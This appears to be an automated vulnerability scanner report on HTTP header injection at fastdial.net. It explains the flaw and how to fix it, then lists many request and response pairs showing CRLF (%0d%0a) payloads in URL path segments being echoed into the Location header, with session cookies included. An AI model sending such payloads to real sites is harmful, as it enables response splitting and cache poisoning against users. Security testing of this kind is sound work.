HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 7f576%0d%0a4fe12b45227 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7f576%0d%0a4fe12b45227/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 18:53:34 GMT Server: Apache Location: http://fastdial.net/7f576 4fe12b45227/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload e1ce0%0d%0afe8ef4b0723 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e1ce0%0d%0afe8ef4b0723/images/common/images/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:28 GMT Server: Apache Location: http://fastdial.net/e1ce0 fe8ef4b0723/images/common/images/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 2 is copied into the Location response header. The payload 39d71%0d%0aa804ef85baf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/39d71%0d%0aa804ef85baf/common/images/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:42 GMT Server: Apache Location: http://fastdial.net/static/39d71 a804ef85baf/common/images/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 3 is copied into the Location response header. The payload 66099%0d%0ad5a2821289b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/66099%0d%0ad5a2821289b/images/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:54 GMT Server: Apache Location: http://fastdial.net/static/images/66099 d5a2821289b/images/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 4 is copied into the Location response header. The payload 6beac%0d%0ab5734230bef was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/6beac%0d%0ab5734230bef/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:11 GMT Server: Apache Location: http://fastdial.net/static/images/common/6beac b5734230bef/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 5 is copied into the Location response header. The payload 34b17%0d%0af35574e0fc4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/34b17%0d%0af35574e0fc4/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:24 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/34b17 f35574e0fc4/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 6 is copied into the Location response header. The payload b74ef%0d%0a58fa0f181ef was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/b74ef%0d%0a58fa0f181ef/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:38 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/b74ef 58fa0f181ef/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 7 is copied into the Location response header. The payload e7c37%0d%0abbc8a889ed6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/images/e7c37%0d%0abbc8a889ed6/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:50 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/images/e7c37 bbc8a889ed6/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 1 is copied into the Location response header. The payload d2cfc%0d%0ad20898ac629 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d2cfc%0d%0ad20898ac629/images/common/images/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:38 GMT Server: Apache Location: http://fastdial.net/d2cfc d20898ac629/images/common/images/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 223d6%0d%0ab15776fcf73 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/223d6%0d%0ab15776fcf73/common/images/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:49 GMT Server: Apache Location: http://fastdial.net/static/223d6 b15776fcf73/common/images/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 245c9%0d%0acc14b45adcb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/245c9%0d%0acc14b45adcb/images/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:04 GMT Server: Apache Location: http://fastdial.net/static/images/245c9 cc14b45adcb/images/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload f9188%0d%0a11ebc15cdfa was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/f9188%0d%0a11ebc15cdfa/common/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:17 GMT Server: Apache Location: http://fastdial.net/static/images/common/f9188 11ebc15cdfa/common/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 5f36a%0d%0aab1482dc121 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/5f36a%0d%0aab1482dc121/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:34 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/5f36a ab1482dc121/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload b0eb3%0d%0ae0b3f170d90 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/b0eb3%0d%0ae0b3f170d90/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:49 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/b0eb3 e0b3f170d90/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 4ab9d%0d%0a529618aa604 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4ab9d%0d%0a529618aa604/images/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:31 GMT Server: Apache Location: http://fastdial.net/4ab9d 529618aa604/images/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload d8005%0d%0a734a80c1657 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/d8005%0d%0a734a80c1657/common/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:53:49 GMT Server: Apache Location: http://fastdial.net/static/d8005 734a80c1657/common/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 296eb%0d%0a57bba17e29c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/296eb%0d%0a57bba17e29c/images/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:54:00 GMT Server: Apache Location: http://fastdial.net/static/images/296eb 57bba17e29c/images/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 9b0da%0d%0a7d300a480ff was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/9b0da%0d%0a7d300a480ff/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:54:15 GMT Server: Apache Location: http://fastdial.net/static/images/common/9b0da 7d300a480ff/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload e2497%0d%0a32038923bb6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/e2497%0d%0a32038923bb6/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:54:40 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/e2497 32038923bb6/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 148ec%0d%0a4a9ca943c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /148ec%0d%0a4a9ca943c5f/images/common/images/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:48 GMT Server: Apache Location: http://fastdial.net/148ec 4a9ca943c5f/images/common/images/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 13c4c%0d%0a438c4c6035b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/13c4c%0d%0a438c4c6035b/common/images/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:59 GMT Server: Apache Location: http://fastdial.net/static/13c4c 438c4c6035b/common/images/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload bb684%0d%0ae6968e5e61d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/bb684%0d%0ae6968e5e61d/images/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:17 GMT Server: Apache Location: http://fastdial.net/static/images/bb684 e6968e5e61d/images/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 57efa%0d%0adb5436924b3 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/57efa%0d%0adb5436924b3/common/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:31 GMT Server: Apache Location: http://fastdial.net/static/images/common/57efa db5436924b3/common/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload b6ef3%0d%0adbfe0b0bf22 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/b6ef3%0d%0adbfe0b0bf22/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:50:42 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/b6ef3 dbfe0b0bf22/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 6 is copied into the Location response header. The payload 94cc5%0d%0ab22e7f7a6e7 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/94cc5%0d%0ab22e7f7a6e7/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:51:00 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/94cc5 b22e7f7a6e7/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 9438f%0d%0a7683117c848 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9438f%0d%0a7683117c848/images/common/images/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:02 GMT Server: Apache Location: http://fastdial.net/9438f 7683117c848/images/common/images/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 2 is copied into the Location response header. The payload 20f1d%0d%0a28337630e9d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/20f1d%0d%0a28337630e9d/common/images/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:14 GMT Server: Apache Location: http://fastdial.net/static/20f1d 28337630e9d/common/images/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 3 is copied into the Location response header. The payload b2b2f%0d%0add341eec25e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/b2b2f%0d%0add341eec25e/images/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:32 GMT Server: Apache Location: http://fastdial.net/static/images/b2b2f dd341eec25e/images/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 4 is copied into the Location response header. The payload 8f5ab%0d%0a1bf37a5abfd was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/8f5ab%0d%0a1bf37a5abfd/common/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:47 GMT Server: Apache Location: http://fastdial.net/static/images/common/8f5ab 1bf37a5abfd/common/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 5 is copied into the Location response header. The payload 210fb%0d%0adc69c9c8861 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/210fb%0d%0adc69c9c8861/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:00 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/210fb dc69c9c8861/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 6 is copied into the Location response header. The payload b9ec1%0d%0a53ca0dbc60b was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/b9ec1%0d%0a53ca0dbc60b/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:17 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/b9ec1 53ca0dbc60b/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 7 is copied into the Location response header. The payload 1f6b3%0d%0a51384ddd502 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/images/common/styles/1f6b3%0d%0a51384ddd502/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:31 GMT Server: Apache Location: http://fastdial.net/static/images/common/images/common/styles/1f6b3 51384ddd502/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain X-Pad: avoid browser bug
The value of REST URL parameter 1 is copied into the Location response header. The payload 56c5a%0d%0af96f86e923b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /56c5a%0d%0af96f86e923b/images/common/images/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:48:58 GMT Server: Apache Location: http://fastdial.net/56c5a f96f86e923b/images/common/images/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 9ee54%0d%0a3898d682a88 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/9ee54%0d%0a3898d682a88/common/images/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:10 GMT Server: Apache Location: http://fastdial.net/static/9ee54 3898d682a88/common/images/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 407c0%0d%0a63c430c82d9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/407c0%0d%0a63c430c82d9/images/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:49:27 GMT Server: Apache Location: http://fastdial.net/static/images/407c0 63c430c82d9/images/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload b890d%0d%0af65beb69505 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/b890d%0d%0af65beb69505/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
